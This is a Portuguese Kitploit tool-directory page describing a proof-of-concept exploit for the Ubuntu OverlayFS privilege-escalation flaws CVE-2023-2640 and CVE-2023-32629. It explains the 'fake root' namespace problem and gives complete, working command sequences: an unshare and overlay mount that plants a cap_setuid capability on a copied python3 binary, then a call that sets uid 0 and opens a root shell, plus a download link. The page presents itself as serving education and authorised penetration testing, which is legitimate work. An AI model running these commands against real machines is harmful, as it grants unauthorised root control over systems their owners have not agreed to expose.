Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-2640-CVE-2023-32629-Interactive-PoC — Um exploit de escalonamento local de privilégios (LPE) limpo, interativo e de múltiplas etapas para Ubuntu OverlayFS (GameOver(lay)) que escapa do sandbox de namespace de usuário para obter um shell root verdadeiro do host. | Kitploit
Ferramentas/GitHubGitHub/amar-imamovic/cve-2023-2640-cve-2023-32629-interactive-poc
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubamar-imamovic/cve-2023-2640-cve-2023-32629-interactive-poc

CVE-2023-2640-CVE-2023-32629-Interactive-PoC

Um exploit de escalonamento local de privilégios (LPE) limpo, interativo e de múltiplas etapas para Ubuntu OverlayFS (GameOver(lay)) que escapa do sandbox de namespace de usuário para obter um shell root verdadeiro do host.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
4há 3 mesesAinda não revisado

CVE-2023-2640 & CVE-2023-32629 (GameOverLay) - PoC de Escape para Root Real do Host

Uma Prova de Conceito (PoC) interativa e em várias etapas de Escalação Local de Privilégios (LPE) que visa as vulnerabilidades OverlayFS do kernel Linux Ubuntu (CVE-2023-2640 / CVE-2023-32629).

Ao contrário dos one-liners automatizados padrão que prendem seu shell interativo dentro de um User Namespace (Fake Root) restritivo, esta metodologia divide a sequência do exploit para obter com segurança um shell root real e irrestrito do host.


O Problema do "Fake Root" Explicado

Muitos exploits públicos combinam a configuração e a execução em uma única sequência de shell automatizada, como esta: unshare -rm sh -c "mkdir l u w m && ... && touch m/*; python3 -c '...'"

Como o payload de execução Python está embutido dentro das aspas duplas do unshare, ele é executado internamente dentro do sandbox do user namespace.

  • O Resultado: Seu ID de usuário aparece como uid=0(root), mas seu shell está criptograficamente isolado do host. Se você tentar visualizar o diretório root do host (cd /root), receberá um erro Permission Denied.

A Correção

Esta PoC divide o processo em dois estágios lógicos distintos:

  1. Weaponizar dentro do Sandbox: Execute unshare para fingir permissões de root apenas pelo tempo suficiente para explorar a falha ovl_copy_up do OverlayFS, vazando uma capability de alto privilégio setcap cap_setuid+eip para uma pasta de binário Python local.
  2. Executar fora do Sandbox: O namespace fecha automaticamente. O binário com backdoor é então executado diretamente do contexto real do host como um usuário comum sem privilégios. O kernel lê a flag vazada, permite os.setuid(0) e concede a você verdadeiros privilégios de administração do sistema no nível do host.

Detalhes da Vulnerabilidade

  • CVE-2023-2640: Restrição incorreta das capabilities de arquivos dentro de user namespaces no OverlayFS do kernel Ubuntu.
  • CVE-2023-32629: Falha na função ovl_copy_up_meta_inode_data do kernel Ubuntu que permite que verificações de validação sejam totalmente ignoradas durante a migração de arquivos.
  • Sistemas Afetados: Ubuntu 22.04 LTS executando versões do Linux Kernel abaixo de 6.2.0-26-generic.

Instruções de Uso

Método 1: O Script Automatizado (Recomendado)

  1. Clone ou baixe o exploit.sh para a máquina alvo (por exemplo, dentro de /tmp).
  2. Dê permissões de execução e execute:
root@kitploit:~
chmod +x exploit.sh
./exploit.sh

Método 2: Execução Interativa Manual Linha por Linha

Se você estiver trabalhando em um reverse shell volátil, execute esses comandos completamente separados, pressionando Enter após cada linha:

root@kitploit:~
# 1. Clean workspace environment 
cd /tmp && rm -rf l u w m

# 2. Forge the backdoor within the temporary namespace sandbox
unshare -rm sh -c "mkdir l u w m && cp /usr/bin/python3 l/ && setcap cap_setuid+eip l/python3 && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*"

# 3. Trigger execution on the real host to claim true root
./u/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Verifique seus privilégios reais consultando seu perfil de usuário atual:

root@kitploit:~
whoami
cat /root/root.txt

Créditos e Agradecimentos

A mecânica básica do exploit usada nesta reformulação interativa foi originalmente descoberta e documentada pelos pesquisadores de segurança Liav Eliyahu e g1vi.

Aviso Legal

Este repositório foi criado estritamente para fins educacionais, de pesquisa em segurança e de testes de penetração autorizados (como laboratórios HackTheBox / OffSec). O autor não se responsabiliza por uso indevido, tentativas de acesso não autorizado ou danos à infraestrutura causados por estes materiais. Use com responsabilidade.

Baixar ferramenta